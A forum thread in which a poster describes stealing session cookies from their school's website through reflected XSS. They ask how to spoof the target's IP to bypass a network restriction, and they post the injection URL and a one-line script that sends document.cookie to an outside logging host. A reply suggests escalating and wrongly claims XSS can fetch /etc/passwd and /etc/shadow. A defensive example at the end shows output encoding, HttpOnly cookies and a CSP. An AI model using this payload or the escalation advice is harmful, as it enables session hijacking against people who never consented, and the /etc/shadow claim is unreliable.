Stealing Cookies
Hey there xD
I was trying to check my school's security level, and I found out that it is quite vulnerable to XSS cookie stealing. When I'm on my school's PC, I can perfectly steal cookies, but when I do this outside, with a proxy of course, I can't. There is this error saying that I need to be in the network to steal the cookies. My question is more a kind of curiosity, since there is nothing about this on Google… Is there any code to camouflage your IP and make you look like the IP of your target? Not any proxy, but the same target… Or is there any way of trespassing this error message?
I think you'll say nope for the first question, and yep for the second one… almost sure :P
Well… I'm using the following code:
http://www.example.com/search.php?query="><script src=http://www.mypage.com/cookiesteal.js>
The JavaScript (cookiesteal.js) contains the code:
location.href = 'http://ccl.whiteacid.org/log.php?xxxxxx'+document.cookie;
What he meant is, are you emailing the visitors the link? If you aren't, you are only going to steal your own cookies.
Also, why does the XSS matter? Are the users logging into the site? Are there cookies to steal that would give you access? If there aren't, why bother stealing cookies? You could do so much more because of the XSS. With that you could do AJAX requests for /etc/passwd and /etc/shadow if they have the right permissions. You don't even need to host a script on your own site since you can just use an XSS. That's where you should be focusing if you can't gain more access on the site by using someone else's cookies.
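The fix for the reflected query parameter discussed in this thread, as an added example that is not part of the original posts or of the site's code: the unescaped reflection beside an output-encoded one, plus cookie flags and a CSP that stop a script like the one above from loading or reading the session. The function names, the input markup and the cookie name are assumptions made for illustration.

```javascript
// Added example. renderSearch*, sessionCookie and the <input> markup are
// hypothetical; the thread does not show the page's real server code.

// Encode the characters that can terminate an HTML text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the query is concatenated into a quoted attribute, so a value
// beginning with "> closes the attribute and the tag, and markup follows.
function renderSearchVulnerable(query) {
  return '<input name="query" value="' + query + '">';
}

// "After": identical markup, with the value encoded at output time.
function renderSearchHardened(query) {
  return '<input name="query" value="' + escapeHtml(query) + '">';
}

// Session cookie that page script cannot read (HttpOnly), that is only sent
// over TLS (Secure) and not on cross-site subrequests (SameSite=Lax).
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defence in depth: only same-origin script files run, so neither an injected
// inline script nor one hosted on another origin is executed by the browser.
const securityHeaders = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self'",
  'X-Content-Type-Options': 'nosniff',
};

// The query value from the URL quoted in the thread.
const reportedQuery = '"><script src=http://www.mypage.com/cookiesteal.js>';

function demo() {
  return {
    before: renderSearchVulnerable(reportedQuery),
    after: renderSearchHardened(reportedQuery),
    setCookie: sessionCookie('sid', 'constructed-sample-value'),
    headers: securityHeaders,
  };
}

console.log(demo());
```

Output encoding is the actual fix; HttpOnly and the CSP limit the damage if another injection point is missed.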